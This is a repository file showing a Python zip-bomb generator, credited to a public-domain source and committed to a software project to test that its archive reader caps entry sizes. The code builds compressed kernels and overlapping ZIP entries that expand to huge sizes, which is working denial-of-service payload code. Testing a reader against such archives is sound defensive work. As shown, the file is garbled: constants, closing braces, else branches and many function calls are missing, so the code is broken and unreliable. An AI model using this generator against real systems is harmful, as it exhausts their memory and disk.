Stefano Baghino 540f3625b0
Ensure DarReader prevents zip bombs (#4703)
* Ensure DarReader prevents zip bombs

[DAML-LF] The DarReader has a 1GB hard cap on ZIP archive entry size to prevent zip bombs

* Properly test UniversalArchiveReader, make it prevent bombs, break away memory heavy tests

* Exclude the zip bomb detection test from running on Mac CI nodes
2020-02-26 13:09:58 +01:00

819 lines
34 KiB

#!/usr/bin/env python3
# Copyright (c) 2020 The DAML Authors. All rights reserved.
# SPDX-License-Identifier: Apache-2.0
# This code was originally released in the public domain (source: https://www.bamsoftware.com/hacks/zipbomb/)
import binascii
import bz2
import getopt
import struct
import sys
import zipfile
CHOSEN_BYTE = ord(b"a") # homage to 42.zip
# CRC-32 precomputation using matrices in GF(2). Similar to crc32_combine in
# zlib. See https://stackoverflow.com/a/23126768 for a description of the idea.
# Here, we use a 33-bit state where the dummy 33rd coordinate is always 1
# (similar to homogeneous coordinates). Matrices are represented as 33-element
# lists, where each element is a 33-bit integer representing one column.
CRC_POLY = 0xedb88320
def matrix_mul_vector(m, v):
r = 0
for shift in range(len(m)):
if (v>>shift) & 1 == 1:
r ^= m[shift]
return r
def matrix_mul(a, b):
assert len(a) == len(b)
return [matrix_mul_vector(a, v) for v in b]
def identity_matrix():
return [1<<shift for shift in range(33)]
# Matrix that updates CRC-32 state for a 0 bit.
CRC_M0 = [CRC_POLY] + [1<<shift for shift in range(31)] + [1<<32]
# Matrix that flips the LSb (x^31 in the polynomial).
CRC_MFLIP = [1<<shift for shift in range(32)] + [(1<<32) + 1]
# Matrix that updates CRC-32 state for a 1 bit: flip the LSb, then act as for a 0 bit.
CRC_M1 = matrix_mul(CRC_M0, CRC_MFLIP)
def precompute_crc_matrix(data):
m = identity_matrix()
for b in data:
for shift in range(8):
m = matrix_mul([CRC_M0, CRC_M1][(b>>shift)&1], m)
return m
def precompute_crc_matrix_repeated(data, n):
accum = precompute_crc_matrix(data)
# Square-and-multiply algorithm to compute m = accum^n.
m = identity_matrix()
while n > 0:
if n & 1 == 1:
m = matrix_mul(m, accum)
accum = matrix_mul(accum, accum)
n >>= 1
return m
def crc_matrix_apply(m, value=0):
return (matrix_mul_vector(m, (value^0xffffffff)|(1<<32)) & 0xffffffff) ^ 0xffffffff
# DEFLATE stuff, see RFC 1951.
class BitBuffer:
def __init__(self):
self.done = []
self.current = 0
self.bit_pos = 0
def push(self, x, n):
assert x == x % (1<<n), (bin(x), n)
while n >= (8 - self.bit_pos):
self.current |= (x << self.bit_pos) & 0xff
x >>= (8 - self.bit_pos)
n -= (8 - self.bit_pos)
self.current = 0
self.bit_pos = 0
self.current |= (x << self.bit_pos) & 0xff
self.bit_pos += n
def push_rev(self, x, n):
mask = (1<<n)>>1
while mask > 0:
self.push(x&mask != 0 and 1 or 0, 1)
mask >>= 1
def bytes(self):
out = bytes(self.done)
if self.bit_pos != 0:
out += bytes([self.current])
return out
# RFC 1951 section 3.2.2. Input is a sym: length dict and output is a
# sym: (code, length) dict.
def huffman_codes_from_lengths(sym_lengths):
bl_count = {}
max_length = 0
for _, length in sym_lengths.items():
bl_count.setdefault(length, 0)
bl_count[length] += 1
max_length = max(max_length, length)
next_code = {}
code = 0
for length in range(max_length):
code = (code + bl_count.get(length, 0)) << 1
next_code[length+1] = code
result = {}
for sym, length in sorted(sym_lengths.items(), key=lambda x: (x[1], x[0])):
assert next_code[length] >> length == 0, (sym, bin(next_code[length]), length)
result[sym] = next_code[length], length
next_code[length] += 1
return result
def print_huffman_codes(sym_codes, **kwargs):
max_sym_length = max(len("{}".format(sym)) for sym in sym_codes)
for sym, code in sorted(sym_codes.items()):
code, length = code
print("{:{}}: {:0{}b}".format(sym, max_sym_length, code, length), **kwargs)
# RFC 1951 section 3.2.5. Returns a tuple (code, extra_bits, num_extra_bits).
def code_for_length(length):
if length < 3:
return None, None, None
elif length < 11:
base_code, base_length, num_bits = 257, 3, 0
elif length < 19:
base_code, base_length, num_bits = 265, 11, 1
elif length < 35:
base_code, base_length, num_bits = 269, 19, 2
elif length < 67:
base_code, base_length, num_bits = 273, 35, 3
elif length < 131:
base_code, base_length, num_bits = 277, 67, 4
elif length < 258:
base_code, base_length, num_bits = 281, 131, 5
raise ValueError(length)
return base_code + ((length - base_length) >> num_bits), (length - base_length) & ((1<<num_bits)-1), num_bits
# DEFLATE a string of a single repeated byte. Runs in two modes, depending on
# whether you provide compressed_size or max_uncompressed_size.
# compressed_size: decompresses to as many bytes as possible given an exact
# compressed length.
# max_uncompressed_size: decompresses to no more than the given number of bytes,
# but as close as possible.
# Returns a tuple (compressed_data, uncompressed_size, crc_matrix).
def bulk_deflate(repeated_byte, compressed_size=None, max_uncompressed_size=None, final=1):
assert (compressed_size is None and max_uncompressed_size is not None) or (compressed_size is not None and max_uncompressed_size is None)
# Huffman tree for code lengths.
code_length_lengths = {
0: 2,
1: 3,
2: 3,
18: 1,
code_length_codes = huffman_codes_from_lengths(code_length_lengths)
# print_huffman_codes(code_length_codes, file=sys.stderr)
# Huffman tree for literal/length values.
ll_lengths = {
repeated_byte: 2, # literal byte
256: 2, # end of stream
285: 1, # copy 285 bytes
ll_codes = huffman_codes_from_lengths(ll_lengths)
# print_huffman_codes(ll_codes, file=sys.stderr)
# Huffman tree for distance codes.
distance_lengths = {
0: 1, # distance 1
distance_codes = huffman_codes_from_lengths(distance_lengths)
# print_huffman_codes(distance_codes, file=sys.stderr)
bits = BitBuffer()
bits.push(0b1, final and 1 or 0)
# BTYPE=10: dynamic Huffman codes
bits.push(0b10, 2)
# HLIT is 257 less than the number of literal/length codes
bits.push(max(ll_lengths) + 1 - 257, 5)
# HDIST is 1 less than the number of distance codes
bits.push(max(distance_lengths) + 1 - 1, 5)
# HCLEN is 4 less than the number of code length codes
CODE_LENGTH_ALPHABET = (16, 17, 18, 0, 8, 7, 9, 6, 10, 5, 11, 4, 12, 3, 13, 2, 14, 1, 15)
num_code_length_codes = max(CODE_LENGTH_ALPHABET.index(sym) for sym in code_length_lengths) + 1
bits.push(num_code_length_codes - 4, 4)
# Output Huffman tree for code lengths.
for code_length in CODE_LENGTH_ALPHABET[:num_code_length_codes]:
bits.push(code_length_lengths.get(code_length, 0), 3)
# Skip n literal/length slots. Assumes we have length codes for 0 and 18.
def skip(n):
while n >= 11:
if n < 138:
x = n
elif n < 138 + 11 and code_length_lengths[18] < (n - 138) * code_length_lengths[0]:
# It'll be cheaper to cut this 18 block short and do the
# remainder with another full 18 block.
x = n - 11
x = 138
bits.push_rev(*code_length_codes[18]) # 7 bits of length to follow
bits.push(x - 11, 7)
n -= x
while n > 0:
n -= 1
# Output a Huffman tree in terms of code lengths.
def output_code_length_tree(sym_lengths):
cur = 0
for sym, length in sorted(sym_lengths.items()):
skip(sym - cur)
cur = sym + 1
# Output Huffman tree for literal/length values.
# Output Huffman tree for distance codes.
n = 0
# A literal byte to start the whole process.
n += 1
# Now every pair of 0 bits encodes 258 copies of repeated_byte.
is_even = bits.bit_pos % 2 == 0
# Including whatever zero bits remain at the end of the bit buffer.
n += (8 - bits.bit_pos + 1) // 2 * 258
prefix = bits.bytes()
bits = BitBuffer()
if not is_even:
if max_uncompressed_size is not None:
# Push bytes to get within 258 of the max we are allowed.
while (max_uncompressed_size - n) % 1032 >= 258:
n += 258
# Push the stream-end code (256) as far back in the byte as possible.
while bits.bit_pos + ll_lengths[285] + distance_lengths[0] + ll_lengths[256] <= 8:
n += 258
suffix = bits.bytes()
if max_uncompressed_size is not None:
num_zeroes = (max_uncompressed_size - n) // 1032
num_zeroes = compressed_size - len(prefix) - len(suffix)
n += num_zeroes * 1032
body = b"\x00" * num_zeroes
compressed_data = prefix + body + suffix
if max_uncompressed_size is not None:
assert (max_uncompressed_size - n) < 258, (n, max_uncompressed_size)
assert len(compressed_data) == compressed_size, (len(compressed_data), compressed_size)
return compressed_data, n, precompute_crc_matrix_repeated(bytes([repeated_byte]), n)
# bzip2 stuff
def bulk_bzip2(repeated_byte, compressed_size=None, max_uncompressed_size=None):
assert (compressed_size is None and max_uncompressed_size is not None) or (compressed_size is not None and max_uncompressed_size is None)
# 45899235, empirically determined to be the largest amount of data that
# fits into a 900 kB block after the initial bzip2 RLE (each 255 bytes
# becomes 5 bytes; 45899235 * 5 / 255 = 899985).
# https://en.wikipedia.org/w/index.php?title=Bzip2&oldid=890453143#File_format
# says it can fit 45899236, 1 byte more, but in my tests that results in a
# second block being emitted.
block_uncompressed_size = 45899235
# Use an actual bzip2 implementation to compress the entire stream, then
# extract from it a single block that we will repeat. This is actually
# bogus, because whatever follows the block header is not necessarily
# byte-aligned, but the assertions will prevent going ahead if things don't
# work out perfectly.
basic = bz2.compress(bytes([repeated_byte])*block_uncompressed_size, 9)
assert len(basic) == 46, basic
header, block, footer, _ = basic[0:4], basic[4:36], basic[36:42], basic[42:]
assert header == b"BZh9", header
assert block.startswith(b"\x31\x41\x59\x26\x53\x59"), block
assert footer == b"\x17\x72\x45\x38\x50\x90", header
block_crc, = struct.unpack(">L", block[6:10])
if compressed_size is not None:
num_blocks = (compressed_size - 4 - 10) // 32
assert (compressed_size - 4 - 10) % 32 == 0
num_blocks = max_uncompressed_size // block_uncompressed_size
n = num_blocks * block_uncompressed_size
# 2.2.4 https://github.com/dsnet/compress/blob/master/doc/bzip2-format.pdf
stream_crc = 0
for i in range(num_blocks):
stream_crc = (block_crc ^ ((stream_crc<<1) | (stream_crc>>31))) & 0xffffffff
crc_matrix = precompute_crc_matrix_repeated(bytes([repeated_byte]), n)
compressed_data = header + block*num_blocks + footer + struct.pack(">L", stream_crc)
return compressed_data, n, crc_matrix
# 8 - The file is Deflated
# 12 - File is compressed using BZIP2 algorithm
# 2.0 - File is compressed using Deflate compression
# 4.5 - File uses ZIP64 format extensions
# 4.6 - File is compressed using BZIP2 compression
MOD_DATE = 0x0548
MOD_TIME = 0x6ca0
def zip_version(compression_method=COMPRESSION_METHOD_DEFLATE, zip64=False):
candidates = [ZIP_VERSION]
if compression_method == COMPRESSION_METHOD_BZIP2:
if zip64:
return max(candidates)
# In Zip64 mode, we add a Zip64 extra field for every file (including using
# ZIP64_VERSION instead of ZIP_VERSION) for *every* file, whether it is large
# enough to need it or not. Past a certain threshold, every file *does* need it
# anyway. It may be slightly better for compatibility to write every file in
# either Zip64 or non-Zip64 mode. See the block comment in putextended in
# zipfile.c of Info-ZIP Zip 3.0 (though the worst incompatibility has to do with
# data descriptors, which we don't use).
# Even in Zip64 mode, we make the assumption that the only field that needs to
# be represented in the Zip64 extra info is uncompressed_size, and not
# compressed_size nor local_file_header_offset (checked with an assertion in
# CentralDirectoryHeader.serialize). This is to make analysis easier (central
# directory headers and local file headers continue to have a fixed size), and
# because the zip file has to be really big for either of those fields to exceed
# 4 GiB—the quoted_overlap method can produce a zip file whose total unzipped
# size is greater than 16 EiB (2^64 bytes) without exceeding either of those
# limits.
class LocalFileHeader:
def __init__(self, compressed_size, uncompressed_size, crc, filename, compression_method=COMPRESSION_METHOD_DEFLATE, extra_tag=None, extra_length_excess=0):
self.compressed_size = compressed_size
self.uncompressed_size = uncompressed_size
self.crc = crc
self.filename = filename
self.compression_method = compression_method
self.extra_tag = extra_tag
self.extra_length_excess = extra_length_excess
def serialize(self, zip64=False):
# APPNOTE.TXT 4.5.3 says that in the local file header, unlike the
# central directory header, we must include both uncompressed_size and
# compressed_size in the Zip64 extra field, even if one of them is not
# so big as to require Zip64.
extra = b""
if zip64:
extra += struct.pack("<HHQQ",
0x0001, # tag type (Zip64)
16, # tag size
self.uncompressed_size, # uncompressed size
self.compressed_size, # compressed size
if self.extra_length_excess > 0:
extra += struct.pack("<HH", self.extra_tag, self.extra_length_excess)
return struct.pack("<LHHHHHLLLHH",
0x04034b50, # signature
zip_version(self.compression_method, zip64), # version needed to extract
0, # flags
self.compression_method, # compression method
MOD_TIME, # modification time
MOD_DATE, # modification date
self.crc, # CRC-32
zip64 and 0xffffffff or self.compressed_size, # compressed size
zip64 and 0xffffffff or self.uncompressed_size, # uncompressed size
len(self.filename), # filename length
len(extra) + self.extra_length_excess, # extra length
) + self.filename + extra
class CentralDirectoryHeader:
# template is a LocalFileHeader instance.
def __init__(self, local_file_header_offset, template):
self.local_file_header_offset = local_file_header_offset
self.compressed_size = template.compressed_size
self.uncompressed_size = template.uncompressed_size
self.crc = template.crc
self.filename = template.filename
self.compression_method = template.compression_method
def serialize(self, zip64=False):
# Even in Zip64 mode, we assume that the only field that needs to be
# represented in the Zip64 extra field is uncompressed_size.
# Also, we set the threshold for compressed_size and
# local_file_header_offset at 0xfffffffe rather than 0xffffffff because
# Go archive/zip which (wrongly, IMO) requires a Zip64 extra field to be
# present when either of the two latter fields is exactly 0xffffffff.
# https://github.com/golang/go/issues/31692
assert self.compressed_size <= 0xfffffffe, self.compressed_size
assert self.local_file_header_offset <= 0xfffffffe, self.local_file_header_offset
extra = b""
if zip64:
extra += struct.pack("<HHQ",
0x0001, # tag type (Zip64)
8, # tag size
self.uncompressed_size, # uncompressed size
# APPNOTE.TXT 4.3.12
return struct.pack("<LHHHHHHLLLHHHHHLL",
0x02014b50, # signature
(0<<8) | zip_version(self.compression_method, zip64), # version made by (0 - MS-DOS/FAT compatible)
zip_version(self.compression_method, zip64), # version needed to extract
0, # flags
self.compression_method, # compression method
MOD_TIME, # modification time
MOD_DATE, # modification date
self.crc, # CRC-32
self.compressed_size, # compressed size
zip64 and 0xffffffff or self.uncompressed_size, # uncompressed size
len(self.filename), # filename length
len(extra), # extra length
0, # file comment length
0, # disk number where file starts
0, # internal file attributes
0, # external file attributes
self.local_file_header_offset, # offset of local file header
) + self.filename + extra
class EndOfCentralDirectory:
def __init__(self, cd_num_entries, cd_size, cd_offset):
self.cd_num_entries = cd_num_entries
self.cd_size = cd_size
self.cd_offset = cd_offset
def serialize(self, zip64=False, compression_method=COMPRESSION_METHOD_DEFLATE):
result = []
if zip64:
# APPNOTE.TXT 4.3.14 Zip64 end of central directory record
# We use the "Version 1" Zip64 EOCD (Zip version 4.5). "Version 2"
# would be indicated by a Zip version of 6.2 or greater. APPNOTE.TXT
# 7.3.3: "The layout of the Zip64 End of Central Directory record
# for all versions starting with 6.2 of this specification will
# follow the Version 2 format."
0x06064b50, # signature
44, # size of remainder of Zip64 EOCD
zip_version(compression_method, zip64), # version made by
zip_version(compression_method, zip64), # version needed to extract
0, # number of this disk
0, # disk of central directory
self.cd_num_entries, # number of central directory entries on this disk
self.cd_num_entries, # number of central directory entries total
self.cd_size, # size of central directory
self.cd_offset, # offset to central directory
# APPNOTE.TXT 4.3.15 Zip64 end of central directory locator
0x07064b50, # signature
0, # number of disk with Zip64 EOCD
self.cd_size + self.cd_offset, # offset of Zip64 EOCD
1, # total number of disks
# APPNOTE.TXT 4.3.16 End of central directory record
0x06054b50, # signature
0, # number of this disk
0, # disk of central directory
zip64 and 0xffff or self.cd_num_entries, # number of central directory entries on this disk
zip64 and 0xffff or self.cd_num_entries, # number of central directory entries total
zip64 and 0xffffffff or self.cd_size, # size of central directory
zip64 and 0xffffffff or self.cd_offset, # offset of central directory
0, # comment length
return b"".join(result)
def filename_for_index(i):
letters = []
while True:
letters.insert(0, FILENAME_ALPHABET[i % len(FILENAME_ALPHABET)])
i = i // len(FILENAME_ALPHABET) - 1
if i < 0:
return bytes(letters)
def write_zip_no_overlap(f, num_files, compressed_size=None, max_uncompressed_size=None, compression_method=COMPRESSION_METHOD_DEFLATE, zip64=False, template=[], **kwargs):
kernel, n, crc_matrix = BULK_COMPRESS[compression_method](CHOSEN_BYTE, compressed_size=compressed_size, max_uncompressed_size=max_uncompressed_size)
central_directory = []
offset = 0
for file, compressed_data in template:
central_directory.append(CentralDirectoryHeader(offset, file))
offset += f.write(file.serialize(zip64=zip64))
offset += f.write(compressed_data)
for i in range(num_files):
file = LocalFileHeader(len(kernel), n, crc_matrix_apply(crc_matrix), filename_for_index(i), compression_method=compression_method)
central_directory.append(CentralDirectoryHeader(offset, file))
offset += f.write(file.serialize(zip64=zip64))
offset += f.write(kernel)
cd_offset = offset
for cd_header in central_directory:
offset += f.write(cd_header.serialize(zip64=zip64))
cd_size = offset - cd_offset
offset += f.write(EndOfCentralDirectory(len(central_directory), cd_size, cd_offset).serialize(zip64=zip64, compression_method=compression_method))
return offset
def write_zip_full_overlap(f, num_files, compressed_size=None, max_uncompressed_size=None, compression_method=COMPRESSION_METHOD_DEFLATE, zip64=False, template=[], **kwargs):
kernel, n, crc_matrix = BULK_COMPRESS[compression_method](CHOSEN_BYTE, compressed_size=compressed_size, max_uncompressed_size=max_uncompressed_size)
central_directory = []
offset = 0
for file, compressed_data in template:
central_directory.append(CentralDirectoryHeader(offset, file))
offset += f.write(file.serialize(zip64=zip64))
offset += f.write(compressed_data)
main_crc = crc_matrix_apply(crc_matrix)
main_file = LocalFileHeader(len(kernel), n, main_crc, filename_for_index(0), compression_method=compression_method)
main_file_offset = offset
offset += f.write(main_file.serialize(zip64=zip64))
offset += f.write(kernel)
cd_offset = offset
for cd_header in central_directory:
offset += f.write(cd_header.serialize(zip64=zip64))
for i in range(num_files):
cd_header = CentralDirectoryHeader(main_file_offset, main_file)
cd_header.filename = filename_for_index(i)
offset += f.write(cd_header.serialize(zip64=zip64))
cd_size = offset - cd_offset
offset += f.write(EndOfCentralDirectory(len(central_directory)+num_files, cd_size, cd_offset).serialize(compression_method=compression_method, zip64=zip64))
return offset
# Optimization: cache calls to precompute_crc_matrix_repeated.
crc_matrix_cache = {}
def memo_crc_matrix_repeated(data, n):
val = crc_matrix_cache.get((data, n))
if val is not None:
return val
val = precompute_crc_matrix_repeated(b"\x00", n)
crc_matrix_cache[(data, n)] = val
return val
# Compute the CRC of prefix+remainder, given the CRC of prefix, the CRC of
# remainder, and a matrix that computes the effect of len(remainder) 0x00 bytes.
# Basically it's the xor of crc32(remainder) and crc32(prefix + zeroes), where
# the latter quantity is the result of applying the matrix to crc32(prefix).
def crc_combine(crc_prefix, crc_remainder, crc_matrix_zeroes):
# Undo the pre- and post-conditioning that crc_matrix_apply does, because
# crc_prefix and crc are already conditioned.
return crc_matrix_apply(crc_matrix_zeroes, crc_prefix ^ 0xffffffff) ^ 0xffffffff ^ crc_remainder
def write_zip_quoted_overlap(f, num_files, compressed_size=None, max_uncompressed_size=None, compression_method=COMPRESSION_METHOD_DEFLATE, zip64=False, template=[], extra_tag=None, max_quoted=0):
class FileRecord:
def __init__(self, header, data, crc_matrix):
self.header = header
self.data = data
self.crc_matrix = crc_matrix
# Figure out how many files we can quote using the extra field.
num_extra_length_files = 0
if extra_tag is not None:
sum = 0
while sum <= 65535:
sum += 30 + 4 + (zip64 and 20 or 0) + len(filename_for_index(num_extra_length_files+1))
num_extra_length_files += 1
num_extra_length_files -= 1
# Compress the kernel.
kernel, kernel_uncompressed_size, kernel_crc_matrix = BULK_COMPRESS[compression_method](CHOSEN_BYTE, compressed_size=compressed_size, max_uncompressed_size=max_uncompressed_size)
header = LocalFileHeader(len(kernel), kernel_uncompressed_size, crc_matrix_apply(kernel_crc_matrix), filename_for_index(num_files-1), compression_method=compression_method)
# An optimization compared to what's described in the paper is that our
# accumulator matrix doesn't represent the bytes of the kernel and all the
# preceding quoted local file headers, but just an equal number of 0x00
# bytes. We track the running CRC along with the matrix and use that with
# crc_combine to compute actual CRCs. This way is faster because we can
# memoize most of the calls to precompute_crc_matrix_repeated(b"\x00", n)
# because many local file headers share the same length.
crc_matrix = precompute_crc_matrix_repeated(b"\x00", kernel_uncompressed_size)
# Initialize the files list with a file containing the kernel.
files = [FileRecord(header, kernel, crc_matrix)]
# DEFLATE non-compressed block quoting, until there are few enough files
# left to use extra field quoting.
while compression_method == COMPRESSION_METHOD_DEFLATE and len(files) < num_files - num_extra_length_files:
# See how subsequent local file headers (and their own quoting blocks)
# we can quote here. Originally we only quoted the one originally
# following header, but it's better to quote as much as we can, because
# then we get a small bonus--5 bytes of output for each quoting header
# we manage to include. The --giant-steps option activates this feature.
# We don't want giant steps whenever we are trying to limit output file
# sizes, as in zblg.zip, so that the smallest file (the file containing
# the kernel) can be as large as possible.
# Whatever the limit, we always need to quote at least one header in
# order to make the construction work.
header_bytes = files[0].header.serialize(zip64=zip64)
num_quoted = len(header_bytes)
crc_quoted = binascii.crc32(header_bytes)
next_file = files[0]
for i in range(1, len(files)):
file_i_header = files[i].header.serialize(zip64=zip64)
if num_quoted + len(files[i-1].data) + len(file_i_header) > max_quoted:
num_quoted += len(files[i-1].data) + len(file_i_header)
crc_quoted = binascii.crc32(files[i-1].data, crc_quoted)
crc_quoted = binascii.crc32(file_i_header, crc_quoted)
next_file = files[i]
# Find the CRC that results from prepending next_header_bytes to the
# following files, whose CRC we already know.
new_crc = crc_combine(crc_quoted, next_file.header.crc, next_file.crc_matrix)
# Accumulate len(next_header_bytes) additional 0x00 bytes into crc_matrix.
new_crc_matrix = matrix_mul(next_file.crc_matrix, memo_crc_matrix_repeated(b"\x00", num_quoted))
# Place a non-final non-compressed DEFLATE block (BFINAL=0, BTYPE=00)
# that quotes up to and including the header of next_file, and joins up
# with the DEFLATE stream that it contains.
quote = struct.pack("<BHH", 0x00, num_quoted, num_quoted ^ 0xffff)
header = LocalFileHeader(
len(quote) + num_quoted + next_file.header.compressed_size,
num_quoted + next_file.header.uncompressed_size,
filename_for_index(num_files - len(files) - 1),
files.insert(0, FileRecord(header, quote, new_crc_matrix))
# Extra-field quoting.
while len(files) < num_files:
next_file = files[0]
next_header_bytes = next_file.header.serialize(zip64=zip64)
header = LocalFileHeader(
filename_for_index(num_files - len(files) - 1),
extra_length_excess=len(next_header_bytes) + next_file.header.extra_length_excess,
files.insert(0, FileRecord(header, b"", next_file.crc_matrix))
for header, data in reversed(template):
files.insert(0, FileRecord(header, data))
central_directory = []
offset = 0
for record in files:
central_directory.append(CentralDirectoryHeader(offset, record.header))
offset += f.write(record.header.serialize(zip64=zip64))
offset += f.write(record.data)
cd_offset = offset
for cd_header in central_directory:
offset += f.write(cd_header.serialize(zip64=zip64))
cd_size = offset - cd_offset
offset += f.write(EndOfCentralDirectory(len(central_directory), cd_size, cd_offset).serialize(compression_method=compression_method, zip64=zip64))
return offset
def load_template(filename):
result = []
with open(filename, "rb") as f:
with zipfile.ZipFile(filename) as z:
for info in z.infolist():
lfh = LocalFileHeader(info.compress_size, info.file_size, info.CRC, info.filename.encode("cp437"), info.compress_type)
filename_length, extra_length = struct.unpack("<HH", f.read(4))
f.seek(filename_length + extra_length, 1)
data = f.read(info.compress_size)
result.append((lfh, data))
return result
def usage(file=sys.stdout):
{program_name} --num-files=N --compressed-size=N [OPTIONS...] > bomb.zip
{program_name} --num-files=N --max-uncompressed-size=N [OPTIONS...] > bomb.zip
The --num-files option and either the --compressed-size or
--max-uncompressed-size options are required.
--algorithm=ALG ALG can be "deflate" (default) or "bzip2"
--alphabet=CHARS alphabet for constructing filenames
--compressed-size=N compressed size of the kernel
--extra=HHHH use extra-field quoting with the type tag 0xHHHH
--giant-steps quote as many headers as possible, not just one
--max-uncompressed-size=N maximum uncompressed size of the kernel
--mode=MODE "no_overlap", "full_overlap", or "quoted_overlap" (default)
--num-files=N number of files to contain, not counting template files
--template=ZIP zip file containing other files to store in the zip bomb
--zip64 enable Zip64 extensions\
""".format(program_name=sys.argv[0]), file=file)
def main():
opts, args = getopt.gnu_getopt(sys.argv[1:], "h", [
assert not args, args
mode = write_zip_quoted_overlap
compressed_size = None
giant_steps = False
max_uncompressed_size = None
extra_tag = None
template_filenames = []
zip64 = False
for o, a in opts:
if o == "--algorithm":
compression_method = {
elif o == "--alphabet":
assert len(set(sorted(a))) == len(a), a
FILENAME_ALPHABET = bytes(a, "utf-8")
elif o == "--compressed-size":
compressed_size = int(a)
elif o == "--extra":
# This is an experimental feature that quotes as many files as
# possible inside the Extra Field of local file headers, rather than
# quoting using DEFLATE non-compressed blocks. The argument is a
# 16-bit hexadecimal tag ID. It should be possible to use any tag ID
# that's unallocated in APPNOTE.TXT 4.5.2.
extra_tag = int(a, 16)
elif o == "--giant-steps":
giant_steps = True
elif o == "--max-uncompressed-size":
max_uncompressed_size = int(a)
elif o == "--mode":
mode = {
"no_overlap": write_zip_no_overlap,
"full_overlap": write_zip_full_overlap,
"quoted_overlap": write_zip_quoted_overlap,
elif o == "--num-files":
num_files = int(a)
elif o == "--template":
elif o == "--zip64":
zip64 = True
elif o in ("-h", "--help"):
if extra_tag is not None and mode != write_zip_quoted_overlap:
print("--extra only makes sense with --mode=quoted_overlap", file=sys.stderr)
if giant_steps and mode != write_zip_quoted_overlap:
print("--giant-steps only makes sense with --mode=quoted_overlap", file=sys.stderr)
max_quoted = 0
if giant_steps:
max_quoted = 0xffff
template = []
for filename in template_filenames:
mode(sys.stdout.buffer, num_files, compressed_size=compressed_size, max_uncompressed_size=max_uncompressed_size, compression_method=compression_method, zip64=zip64, template=template, extra_tag=extra_tag, max_quoted=max_quoted)
if __name__ == "__main__":